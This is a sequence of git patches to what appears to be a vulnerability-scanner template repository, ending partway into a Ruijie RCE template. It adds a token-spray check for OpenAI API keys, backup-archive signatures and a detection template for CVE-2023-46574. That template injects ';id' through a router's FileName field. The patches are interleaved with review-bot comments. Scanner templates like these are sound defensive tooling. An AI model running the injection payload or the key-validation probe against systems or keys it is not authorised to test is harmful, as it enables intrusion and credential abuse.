From 2a8297530e1ee2badbfc8c198715471685f1da82 Mon Sep 17 00:00:00 2001 From: malacupa Date: Tue, 12 Dec 2023 22:11:35 +0100 Subject: [PATCH 01/64] add saas detection for Microsoft Entra application proxy --- dns/dns-saas-service-detection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index d82de2443e..6fce566744 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -55,6 +55,7 @@ dns: - "servicebus.windows.net" - "visualstudio.com" - "-msedge.net" + - "msappproxy.net" - "trafficmanager.net" - type: word From daee70d4bea7392fd9aa04fc5e8a683f2cc4c035 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Sun, 17 Dec 2023 18:53:55 +0000 Subject: [PATCH 02/64] Create api-openai.yaml --- http/token-spray/api-openai.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/token-spray/api-openai.yaml diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml new file mode 100644 index 0000000000..af6e06f2b8 --- /dev/null +++ b/http/token-spray/api-openai.yaml @@ -0,0 +1,31 @@ +id: api-openai + +info: + name: OpenAI API Test + author: geeknik + severity: info + reference: + - https://platform.openai.com/docs/api-reference + metadata: + max-request: 1 + tags: token-spray,openai + +self-contained: true + +http: + - method: POST + path: + - "https://api.openai.com/v1/engines/davinci-codex/completions" + + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'invalid_request_error' + - 'Incorrect API key' + - 'invalid_api_key' + condition: or + negative: true From 04414d336405801473ffc0b0db5fbaaad8ac82f0 Mon Sep 17 00:00:00 2001 
From: geeknik <466878+geeknik@users.noreply.github.com> Date: Sun, 17 Dec 2023 19:18:08 +0000 Subject: [PATCH 03/64] Update api-openai.yaml --- http/token-spray/api-openai.yaml | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml index af6e06f2b8..a472f5d046 100644 --- a/http/token-spray/api-openai.yaml +++ b/http/token-spray/api-openai.yaml @@ -15,12 +15,26 @@ self-contained: true http: - method: POST path: - - "https://api.openai.com/v1/engines/davinci-codex/completions" + - "https://api.openai.com/v1/chat/completions" + body: | + { + "model": "gpt-3.5-turbo", + "messages": [ + {"role": "system", "content": "You are a helpful assistant designed to output JSON."}, + {"role": "user", "content": "Who won the world series in 2020?"} + ] + } headers: Content-Type: application/json Authorization: Bearer {{token}} + + matchers-condition: and matchers: + - type: word + part: body + words: + - 'Los Angeles Dodgers' - type: word part: body words: From 4526cde48b8ecb04ea8bfc450d6b9f44cfd9f675 Mon Sep 17 00:00:00 2001 From: Blackbird594 Date: Fri, 22 Dec 2023 10:20:03 +0000 Subject: [PATCH 04/64] Added .tar extention and Matcher for it --- exposures/backups/zip-backup-files.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index d5e647afda..f616e24b6c 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -17,6 +17,7 @@ requests: attack: pitchfork payloads: EXT: + - "tar" - "7z" - "bz2" - "gz" @@ -47,6 +48,8 @@ requests: matchers: - type: binary binary: + - "7573746172202000" #tar + - "7573746172003030" #tar - "377ABCAF271C" # 7z - "314159265359" # bz2 - "53514c69746520666f726d6174203300" # SQLite format 3. From 0eac77faddfbbe2df5b051e0f05953d8a2ee2bef Mon Sep 17 00:00:00 2001 
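Review bot: The positive matcher added in this hunk keys on `'Los Angeles Dodgers'`, free-text model output that no completion guarantees, so a valid key can still be reported as invalid, and every probe of a valid key is a billable chat completion charged to the key owner's quota. A key-validity check should use the non-billable `GET https://api.openai.com/v1/models` endpoint instead: drop the request body, and pair the existing negative error-string matcher with a `status` matcher on 200 as the positive signal. The rewritten request block follows; the negative word matcher that already sits below it is unchanged.
```yaml
http:
  - method: GET
    path:
      - "https://api.openai.com/v1/models"

    headers:
      Authorization: Bearer {{token}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # … unchanged: negative word matcher on the error strings …
```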
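Review bot: The two tar signature entries in the second hunk are commented as `#tar`, unlike every neighbouring entry (`# 7z`, `# bz2`), and the comment says nothing about where the bytes sit; the `ustar` magic lives at byte offset 257 of a tar header rather than at the start of the file like the other signatures, so the match only fires when the body read includes that offset. Suggested lines: `- "7573746172202000" # tar (GNU "ustar  \0", offset 257)` and `- "7573746172003030" # tar (POSIX "ustar\0" + "00", offset 257)`. The same two lines are added again in PATCH 08 and PATCH 10; the full listing in PATCH 08 shows `max-size: 500`, which covers that offset, but the PATCH 10 hunk does not show the cap for the `http/` copy of the template, so confirm it there.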
From: "[PDBot]" Date: Sat, 23 Dec 2023 12:40:35 +0000 Subject: [PATCH 05/64] Syncing Templates --- .github/workflows/templates-sync.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3c63f71a1b..010833cd7f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -55,6 +55,15 @@ on: - 'http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml' - 'http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml' - 'http/vulnerabilities/other/sslvpn-client-rce.yaml' + - 'http/cves/2018/CVE-2018-8823.yaml' + - 'http/cves/2022/CVE-2022-0087.yaml' + - 'http/cves/2023/CVE-2023-26035.yaml' + - 'http/cves/2023/CVE-2023-46359.yaml' + - 'http/cves/2023/CVE-2023-6038.yaml' + - 'http/misconfiguration/aws/cdn-cache-poisoning.yaml' + - 'http/misconfiguration/h2o/h2o-arbitary-file-read.yaml' + - 'http/misconfiguration/h2o/h2o-dashboard.yaml' + - 'http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From b75ff4d154d6274fdc794e426c49b3b980253417 Mon Sep 17 00:00:00 2001 From: Blackbird594 Date: Fri, 22 Dec 2023 10:20:03 +0000 Subject: [PATCH 08/64] Added .tar extention and Matcher for it --- exposures/backups/zip-backup-files.yaml | 74 +++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 exposures/backups/zip-backup-files.yaml diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml new file mode 100644 index 0000000000..f616e24b6c --- /dev/null +++ b/exposures/backups/zip-backup-files.yaml 
@@ -0,0 +1,74 @@ +id: zip-backup-files + +info: + name: Compressed Backup File + author: toufik-airane,dwisiswant0,ffffffff0x + severity: medium + tags: exposure,backup + +requests: + - method: GET + path: + - "{{BaseURL}}/{{FQDN}}.{{EXT}}" # www.example.com + - "{{BaseURL}}/{{RDN}}.{{EXT}}" # example.com + - "{{BaseURL}}/{{DN}}.{{EXT}}" # example + - "{{BaseURL}}/{{SD}}.{{EXT}}" # www + + attack: pitchfork + payloads: + EXT: + - "tar" + - "7z" + - "bz2" + - "gz" + - "lz" + - "rar" + - "tar.gz" + - "tar.bz2" + - "xz" + - "zip" + - "z" + - "tar.z" + - "db" + - "sqlite" + - "sqlitedb" + - "sql.7z" + - "sql.bz2" + - "sql.gz" + - "sql.lz" + - "sql.rar" + - "sql.tar.gz" + - "sql.xz" + - "sql.zip" + - "sql.z" + - "sql.tar.z" + + max-size: 500 # Size in bytes - Max Size to read from server response + matchers-condition: and + matchers: + - type: binary + binary: + - "7573746172202000" #tar + - "7573746172003030" #tar + - "377ABCAF271C" # 7z + - "314159265359" # bz2 + - "53514c69746520666f726d6174203300" # SQLite format 3. + - "1f8b" # gz tar.gz + - "526172211A0700" # rar RAR archive version 1.50 + - "526172211A070100" # rar RAR archive version 5.0 + - "FD377A585A0000" # xz tar.xz + - "1F9D" # z tar.z + - "1FA0" # z tar.z + - "4C5A4950" # lz + - "504B0304" # zip + condition: or + part: body + + - type: regex + regex: + - "application/[-\\w.]+" + part: header + + - type: status + status: + - 200 From 43d4c153b88c6b418e3856ed5248fed851f35bce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 23 Dec 2023 22:27:26 +0700 Subject: [PATCH 10/64] fix --- http/exposures/backups/zip-backup-files.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index add5e5e76a..618ea38752 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml 
@@ -47,6 +47,7 @@ http: - "Release" - "inetpub" EXT: + - "tar" - "7z" - "bz2" - "gz" @@ -78,6 +79,8 @@ http: matchers: - type: binary binary: + - "7573746172202000" #tar + - "7573746172003030" #tar - "377ABCAF271C" # 7z - "314159265359" # bz2 - "53514c69746520666f726d6174203300" # SQLite format 3. @@ -101,4 +104,4 @@ http: status: - 200 -# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6b99dac13cadd5e6d2b513c494c076dc354e2ecd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 23 Dec 2023 22:28:08 +0700 Subject: [PATCH 11/64] delete old protocol --- exposures/backups/zip-backup-files.yaml | 74 ------------------------- 1 file changed, 74 deletions(-) delete mode 100644 exposures/backups/zip-backup-files.yaml diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml deleted file mode 100644 index f616e24b6c..0000000000 --- a/exposures/backups/zip-backup-files.yaml +++ /dev/null 
@@ -1,74 +0,0 @@ -id: zip-backup-files - -info: - name: Compressed Backup File - author: toufik-airane,dwisiswant0,ffffffff0x - severity: medium - tags: exposure,backup - -requests: - - method: GET - path: - - "{{BaseURL}}/{{FQDN}}.{{EXT}}" # www.example.com - - "{{BaseURL}}/{{RDN}}.{{EXT}}" # example.com - - "{{BaseURL}}/{{DN}}.{{EXT}}" # example - - "{{BaseURL}}/{{SD}}.{{EXT}}" # www - - attack: pitchfork - payloads: - EXT: - - "tar" - - "7z" - - "bz2" - - "gz" - - "lz" - - "rar" - - "tar.gz" - - "tar.bz2" - - "xz" - - "zip" - - "z" - - "tar.z" - - "db" - - "sqlite" - - "sqlitedb" - - "sql.7z" - - "sql.bz2" - - "sql.gz" - - "sql.lz" - - "sql.rar" - - "sql.tar.gz" - - "sql.xz" - - "sql.zip" - - "sql.z" - - "sql.tar.z" - - max-size: 500 # Size in bytes - Max Size to read from server response - matchers-condition: and - matchers: - - type: binary - binary: - - "7573746172202000" #tar - - "7573746172003030" #tar - - "377ABCAF271C" # 7z - - "314159265359" # bz2 - - "53514c69746520666f726d6174203300" # SQLite format 3. - - "1f8b" # gz tar.gz - - "526172211A0700" # rar RAR archive version 1.50 - - "526172211A070100" # rar RAR archive version 5.0 - - "FD377A585A0000" # xz tar.xz - - "1F9D" # z tar.z - - "1FA0" # z tar.z - - "4C5A4950" # lz - - "504B0304" # zip - condition: or - part: body - - - type: regex - regex: - - "application/[-\\w.]+" - part: header - - - type: status - status: - - 200 From 0fa6a4e2c3a8cf23cff9a2540b94c4743d68edf4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 23 Dec 2023 15:31:21 +0000 Subject: [PATCH 12/64] Auto Generated New Template Addition List [Sat Dec 23 15:31:21 UTC 2023] :robot: --- .new-additions | 61 -------------------------------------------------- 1 file changed, 61 deletions(-) diff --git a/.new-additions b/.new-additions index aa9693be58..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions 
@@ -1,61 +0,0 @@ -code/cves/2023/CVE-2023-49105.yaml -headless/cves/2018/CVE-2018-25031.yaml -http/cves/2018/CVE-2018-8823.yaml -http/cves/2021/CVE-2021-29200.yaml -http/cves/2021/CVE-2021-44910.yaml -http/cves/2022/CVE-2022-0087.yaml -http/cves/2023/CVE-2023-22232.yaml -http/cves/2023/CVE-2023-26035.yaml -http/cves/2023/CVE-2023-30534.yaml -http/cves/2023/CVE-2023-3368.yaml -http/cves/2023/CVE-2023-36144.yaml -http/cves/2023/CVE-2023-39002.yaml -http/cves/2023/CVE-2023-41265.yaml -http/cves/2023/CVE-2023-41266.yaml -http/cves/2023/CVE-2023-43177.yaml -http/cves/2023/CVE-2023-46359.yaml -http/cves/2023/CVE-2023-49070.yaml -http/cves/2023/CVE-2023-5556.yaml -http/cves/2023/CVE-2023-6018.yaml -http/cves/2023/CVE-2023-6020.yaml -http/cves/2023/CVE-2023-6021.yaml -http/cves/2023/CVE-2023-6038.yaml -http/cves/2023/CVE-2023-6380.yaml -http/cves/2023/CVE-2023-6553.yaml -http/default-logins/dataease/dataease-default-login.yaml -http/default-logins/splunk/splunk-default-login.yaml -http/exposed-panels/dataease-panel.yaml -http/exposed-panels/reportico-admin-panel.yaml -http/exposed-panels/tailon-panel.yaml -http/exposed-panels/vue-pacs-panel.yaml -http/exposed-panels/woodwing-panel.yaml -http/exposures/configs/dompdf-config.yaml -http/misconfiguration/aws/cdn-cache-poisoning.yaml -http/misconfiguration/h2o/h2o-arbitary-file-read.yaml -http/misconfiguration/h2o/h2o-dashboard.yaml -http/misconfiguration/installer/businesso-installer.yaml -http/misconfiguration/installer/chamilo-installer.yaml -http/misconfiguration/installer/espocrm-installer.yaml -http/misconfiguration/installer/knowledgetree-installer.yaml -http/misconfiguration/installer/phpgedview-installer.yaml -http/misconfiguration/installer/wowcms-installer.yaml -http/misconfiguration/mixed-active-content.yaml -http/misconfiguration/mixed-passive-content.yaml -http/misconfiguration/secnet-info-leak.yaml -http/misconfiguration/woodwing-git.yaml -http/misconfiguration/woodwing-phpinfo.yaml 
-http/technologies/bamboo-detect.yaml -http/technologies/element-web-detect.yaml -http/technologies/iparapheur-detect.yaml -http/technologies/matrix-homeserver-detect.yaml -http/vulnerabilities/dahua/dahua-wpms-lfi.yaml -http/vulnerabilities/dahua/dahua-wpms-rce.yaml -http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml -http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml -http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml -http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml -http/vulnerabilities/other/sslvpn-client-rce.yaml -http/vulnerabilities/other/yibao-sqli.yaml -http/vulnerabilities/other/yunanbao-rce.yaml -http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml -javascript/cves/2023/CVE-2023-46604.yaml From 2c52660d51d5a20a7fe122d74ece9f250f0511d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 23 Dec 2023 15:31:37 +0000 Subject: [PATCH 13/64] Auto Generated Templates Checksum [Sat Dec 23 15:31:37 UTC 2023] :robot: --- templates-checksum.txt | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bf3b92a03c..acb1d61ef4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
@@ -2,18 +2,18 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:b4463d7ed41c0ac8f42d06c3952767923c03478e +README.md:f00189942f4fa9e414b1089ada7711614b11e85b README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:00d0be55644f406ad1bdb19f957df95152440ebe -TEMPLATES-STATS.md:83081b616907b600caa4b294556793eb55f81bf9 -TOP-10.md:9d874df00b5b3824ffaa42314a0e0549a3292446 +TEMPLATES-STATS.json:7ccb771c271fe2c18e8d9b86ffc044c3c3affd4a +TEMPLATES-STATS.md:1c9813a0af8a44e624302050722dfec4d140810c +TOP-10.md:2cd79b73aec87dde6c2ca8ef5f0df433fab3d107 code/cves/2023/CVE-2023-2640.yaml:50153a9f47faa62533d609faec8d12113d620354 code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a config/recommended.yml:56cce704c23915f282aa2bca69952626aeea5e13 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:393e94bc85a915c5e2efa4557b00fb6ccdfdec93 -cves.json-checksum.txt:f21e511ade96e01e7bb7f9d96e08e556c718e48c +cves.json:4500cac1239266cc0c96b02fc4bf689290b18f93 +cves.json-checksum.txt:f110519bd9447c733f8276833f45a4c38375f1ed dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 
@@ -2882,7 +2882,7 @@ http/cves/2023/CVE-2023-4568.yaml:0bd963794f42d4383e64913b7b879782ceec2054 http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10 http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a -http/cves/2023/CVE-2023-46359.yaml:b1170e0eabce6a6a06ae81ec0ece5133da436597 +http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375 http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801 @@ -4081,7 +4081,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db http/exposures/backups/php-backup-files.yaml:704953727958a0d9548426b00a0cb2d8558e31a5 http/exposures/backups/settings-php-files.yaml:466d0c870b539961c1cafb1b2e758aec08711df8 http/exposures/backups/sql-dump.yaml:370dbe1277256449870f9eb992b6a90ca636e887 -http/exposures/backups/zip-backup-files.yaml:8cf2dd99ecd30272989353d8e3436c7ebb9db30a +http/exposures/backups/zip-backup-files.yaml:47253ccff6b54b2567784cdb93e322e636337303 http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297 
@@ -7707,7 +7707,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:1d23d1aacf1e4190c82bd26e8dac8713e6edc398 +templates-checksum.txt:10238dd5a08d3f60e31e1a95f4f1eb8bc0349f35 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1234edc2af9b5ab9983fd0c3bd7ab4cc282ac1ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 23 Dec 2023 15:33:16 +0000 Subject: [PATCH 14/64] Auto Template Signing [Sat Dec 23 15:33:16 UTC 2023] :robot: --- http/exposures/backups/zip-backup-files.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index 618ea38752..ae605013fc 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -103,5 +103,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1b960a5ba045bf36ea054d29625ba8d82bdc3c2ff9142dd3404c7c985830e00022100ba48d514f25d68bd0a5d8e673ef37791052fc026a12860ac837c73a519dd7e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ae5055168b2cd98c731ebadabdb9e3f604342264 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 24 Dec 2023 07:55:27 +0000 Subject: [PATCH 15/64] Syncing Templates --- .github/workflows/templates-sync.yml | 61 ---------------------------- 1 file changed, 61 deletions(-) 
diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 010833cd7f..b07f36c8e5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml 
@@ -3,67 +3,6 @@ on: push: paths: - '.new-additions' - - 'http/cves/2023/CVE-2023-41266.yaml' - - 'http/cves/2023/CVE-2023-43177.yaml' - - 'http/cves/2023/CVE-2023-49070.yaml' - - 'http/cves/2023/CVE-2023-5556.yaml' - - 'http/cves/2023/CVE-2023-6018.yaml' - - 'http/cves/2023/CVE-2023-6020.yaml' - - 'http/cves/2023/CVE-2023-6021.yaml' - - 'http/cves/2023/CVE-2023-6380.yaml' - - 'http/default-logins/dataease/dataease-default-login.yaml' - - 'http/default-logins/splunk/splunk-default-login.yaml' - - 'http/exposed-panels/dataease-panel.yaml' - - 'http/exposed-panels/reportico-admin-panel.yaml' - - 'http/exposed-panels/tailon-panel.yaml' - - 'http/exposed-panels/woodwing-panel.yaml' - - 'http/exposures/configs/dompdf-config.yaml' - - 'http/misconfiguration/installer/businesso-installer.yaml' - - 'http/misconfiguration/installer/chamilo-installer.yaml' - - 'http/misconfiguration/installer/knowledgetree-installer.yaml' - - 'http/misconfiguration/installer/phpgedview-installer.yaml' - - 'http/misconfiguration/installer/wowcms-installer.yaml' - - 'http/misconfiguration/secnet-info-leak.yaml' - - 'http/misconfiguration/woodwing-git.yaml' - - 'http/misconfiguration/woodwing-phpinfo.yaml' - - 'http/technologies/element-web-detect.yaml' - - 'http/technologies/matrix-homeserver-detect.yaml' - - 'http/vulnerabilities/dahua/dahua-wpms-lfi.yaml' - - 'http/vulnerabilities/dahua/dahua-wpms-rce.yaml' - - 'http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml' - - 'http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml' - - 'http/vulnerabilities/other/yibao-sqli.yaml' - - 'http/vulnerabilities/other/yunanbao-rce.yaml' - - 'javascript/cves/2023/CVE-2023-46604.yaml' - - 'headless/cves/2018/CVE-2018-25031.yaml' - - 'http/cves/2021/CVE-2021-44910.yaml' - - 'http/cves/2023/CVE-2023-22232.yaml' - - 'http/cves/2023/CVE-2023-30534.yaml' - - 'http/cves/2023/CVE-2023-3368.yaml' - - 'http/cves/2023/CVE-2023-36144.yaml' - - 'http/cves/2023/CVE-2023-39002.yaml' - - 
'http/cves/2023/CVE-2023-41265.yaml' - - 'code/cves/2023/CVE-2023-49105.yaml' - - 'http/cves/2021/CVE-2021-29200.yaml' - - 'http/cves/2023/CVE-2023-6553.yaml' - - 'http/exposed-panels/vue-pacs-panel.yaml' - - 'http/misconfiguration/installer/espocrm-installer.yaml' - - 'http/misconfiguration/mixed-active-content.yaml' - - 'http/misconfiguration/mixed-passive-content.yaml' - - 'http/technologies/bamboo-detect.yaml' - - 'http/technologies/iparapheur-detect.yaml' - - 'http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml' - - 'http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml' - - 'http/vulnerabilities/other/sslvpn-client-rce.yaml' - - 'http/cves/2018/CVE-2018-8823.yaml' - - 'http/cves/2022/CVE-2022-0087.yaml' - - 'http/cves/2023/CVE-2023-26035.yaml' - - 'http/cves/2023/CVE-2023-46359.yaml' - - 'http/cves/2023/CVE-2023-6038.yaml' - - 'http/misconfiguration/aws/cdn-cache-poisoning.yaml' - - 'http/misconfiguration/h2o/h2o-arbitary-file-read.yaml' - - 'http/misconfiguration/h2o/h2o-dashboard.yaml' - - 'http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 377eb77a12d06fbed02b7352a4675f9a02e1623b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 06:26:03 +0530 Subject: [PATCH 16/64] Create CVE-2023-46574.yaml --- http/cves/2023/CVE-2023-46574.yaml | 59 ++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/cves/2023/CVE-2023-46574.yaml diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml new file mode 100644 index 0000000000..18437bd2b8 --- /dev/null +++ b/http/cves/2023/CVE-2023-46574.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2023-46574 + +info: + name: TOTOLINK A3700R - Command Injection + author: DhiyaneshDk + severity: critical + description: | + An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-46574 + - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-46574 + cwe-id: CWE-77 + epss-score: 0.00223 + epss-percentile: 0.60602 + cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: totolink + product: a3700r_firmware + shodan-query: title:"Totolink" + tags: cve,cve2023,totolink,router,iot,rce + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "TOTOLINK")' + condition: and + + - method: GET + path: + - "{{BaseURL}}/cgi-bin/cstecgi.cgi" + body: | + { + "topicurl":"UploadFirmwareFile", + "FileName":";id" + } + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)" + + - type: status + status: + - 200 From ff644b0be2aff47f1a4df8e6e11364e165ad0e24 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 06:28:56 +0530 Subject: [PATCH 17/64] trail space fix --- http/cves/2023/CVE-2023-46574.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 18437bd2b8..b72b32e83e 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml 
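Review bot: `metadata.max-request: 1` understates what this template sends: the `flow: http(1) && http(2)` line drives two HTTP requests, so the value should be `max-request: 2`; the same mismatch is in the ruijie template of PATCH 18 and in the docker template of PATCH 19, which issues two raw requests. The second request here is a `GET` that carries a JSON `body:` without a `Content-Type: application/json` header; many servers ignore a body on GET, so confirm against the referenced PoC whether this should be `method: POST` with that header. The regex `uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)` puts literal parentheses inside each character class, which reads like a typo for `[0-9a-z]`; it still matches, but `uid=([0-9a-z]+) gid=([0-9a-z]+) groups=([0-9a-z]+)` says what is meant (PATCH 18 and PATCH 23 carry the same class).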
@@ -40,7 +40,7 @@ http: condition: and - method: GET - path: + path: - "{{BaseURL}}/cgi-bin/cstecgi.cgi" body: | { From f5507a81b91f208ae3a416662a24da4e508b94f3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 06:35:52 +0530 Subject: [PATCH 18/64] Create ruijie-rg-eg-web-mis-rce.yaml --- .../ruijie/ruijie-rg-eg-web-mis-rce.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml diff --git a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml new file mode 100644 index 0000000000..fdacc071c8 --- /dev/null +++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml @@ -0,0 +1,43 @@ +id: ruijie-rg-eg-web-mis-rce + +info: + name: Ruijie RG-EG - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + Ruijie 